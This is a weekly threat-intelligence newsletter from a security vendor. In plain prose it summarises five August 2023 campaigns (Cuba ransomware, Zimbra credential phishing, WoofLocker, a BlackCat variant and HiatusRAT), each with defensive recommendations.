Zimbra email users face targeted credential theft attacks

SISA Weekly Threat Watch - 28 August 2023

Over the past week, the cybersecurity landscape has witnessed a dynamic surge in digital threats, highlighting the ever-evolving tactics of malicious actors. From targeted campaigns compromising Zimbra email users to Cuba ransomware’s strategic evolution, the emergence of WoofLocker’s deceptive toolkit, and the resurgence of HiatusRAT’s attacks, a series of impactful incidents has unfolded. As these diverse and complex cyber threats continue to evolve, the importance of robust cybersecurity practices cannot be overstated.

SISA Weekly Threat Watch – our weekly feature brings to you a quick snapshot of all the major security vulnerabilities that posed a threat to organizations worldwide. These recurring actionable threat advisories will also provide information and recommendations that will help security teams take appropriate actions to defend against the latest and critical threats.

1. Cuba ransomware targets critical U.S. sectors using the Veeam exploit

The Cuba ransomware threat group has exhibited an evolution in their tactics, techniques, and procedures (TTPs). In a recent campaign in June, they attacked an organization in the U.S. critical infrastructure sector and an IT integrator in Latin America, in which they used a combination of previously known methods along with the introduction of new tools to compromise their targets. In the initial stage of the attack, they deployed BUGHATCH, a custom downloader specific to this group. This downloader makes a connection to a command-and-control (C2) server and fetches payloads of the attacker’s choice, often small PE files or PowerShell scripts.

Metasploit, a popular penetration testing framework, was used by the Cuba operators to gain an initial foothold within the target environment. Furthermore, the group leveraged the ‘ZeroLogon’ vulnerability, a Microsoft NetLogon protocol flaw. This vulnerability could escalate privileges against active directory (AD) domain controllers, potentially giving attackers control of a vulnerable domain. A new addition in this campaign was the exploit for the Veeam vulnerability CVE-2023-27532. This vulnerability, if exploited, grants the attacker access to credentials stored in the configuration file of the Veeam Backup & Replication software. It is crucial for organizations to invest in robust cybersecurity infrastructure and practices such as network monitoring, endpoint security, and access control to safeguard their assets and data from such evolving attacks.

2. New wave of attack campaigns targeting Zimbra email users for credential theft

Security researchers have identified an active phishing campaign aimed at Zimbra Collaboration software users. The crux of this campaign centers around deceptive emails purportedly from email server administrators. These emails use various social engineering tactics to create a sense of urgency or importance. Examples include notifications of an email server update or impending account deactivation.

Attached to these emails is an HTML file. When opened, this file redirects the user to a counterfeit Zimbra login page. Once submitted, the login credentials are sent to a server under the attacker’s control. A particularly concerning detail is the attackers’ use of already-compromised Zimbra accounts. These accounts serve a dual purpose: they legitimize subsequent phishing emails (as they come from genuine accounts) and amplify the campaign’s reach. Organizations must remain vigilant, combining both technical safeguards like robust email security controls and Two-Factor Authentication (2FA) as well as user education to defend against such threats.

3. WoofLocker toolkit hides malicious codes in images to run tech support scams

WoofLocker is an advanced traffic redirection scheme predominantly employed for tech support scams. It employs advanced techniques like malicious JavaScript embedding and steganography to discern and target genuine users. Upon visiting a compromised site, WoofLocker’s embedded malicious JavaScript is initiated, and it retrieves the WoofLocker framework directly into the Document Object Model (DOM) from a few domain names. Initially, the injected code on compromised sites was straightforward and contained fingerprinting checks. However, by 2021, the threat actors modified this approach.

The code was streamlined, and certain logic components were externalized. This external injection makes detection even more challenging. When using tools like Chrome’s Developer Tools, the injected code becomes visible dynamically within the DOM.  The acquired information from each user is relayed back to the server in the form of a PNG image using steganography. If the user is deemed legitimate, they are redirected to a unique URL that displays a fake warning about computer viruses. Users are recommended to restrict unrecognized JavaScripts, employ advanced security solutions, and remain vigilant and informed about potential online hazards.

4. New variant of BlackCat ransomware incorporates Impacket and RemCom

BlackCat, is a criminal gang with connections to former REvil members that speaks Russian and is thought to be a successor to DarkSide and BlackMatter. A new version of the BlackCat ransomware (aka ALPHV and Noberus) has been discovered, that embeds tools like Impacket and RemCom to facilitate lateral movement and remote code execution. Impacket is a set of open-source modules created for network penetration testing, security evaluations, and associated research. According to Microsoft, BlackCat spreads ransomware in target environments by leveraging Impacket’s credential dumping and remote service execution components.

The RemCom tool allows for remote code execution. It is embedded in the ransomware usernames and passwords already set up. It allows them to spread the ransomware to other computers in the network and lock up more files for ransom. It is recommended that every administrative interface is thoroughly monitored and granularly configured with proper access controls. Organizations may control the software execution within client systems based on attributes, such as executable file path, hash, and publisher. For most organizations, an allow list can be used to enforce consistency and enable alerting when there is an anomaly detected. This will allow execution of authorized software only and prevent malicious software or threat actor tools from executing without explicit exception rules.

5. HiatusRAT returns with a new series of attacks

Researchers have unearthed a malicious software, HiatusRAT, specifically targeting the outdated DrayTek Vigor routers. The HiatusRAT campaign’s initiation relies heavily on a bash script, a common tool for automating tasks in Linux environments. Once HiatusRAT infiltrates a system, it springs into action, clandestinely logging user activities. Beyond this, it performs a detailed reconnaissance, pulling system details ranging from MAC addresses to firmware versions.

Custom tcpdump, another critical component of this campaign, is engineered for precise packet capture on the compromised devices. This tool is not just a passive observer; it actively scans and monitors traffic, specifically focusing on email and file-transfer communications from adjacent LANs. The threat actors behind HiatusRAT have been careful to maintain a minimal digital footprint, thereby evading detection. Organizations are recommended to embrace VPN-based access to insulate and protect sensitive data and adopt cryptographic protocols, such as SSL and TLS, reinforcing data integrity during transfers.

To get daily updates on the critical vulnerabilities being exploited by threat actors, subscribe to SISA Daily Threat Watch – our daily actionable threat advisories.

For a deeper understanding of how you can prevent these threats from affecting your organization, request a call to get in touch with our experts.

SISA’s Latest
close slider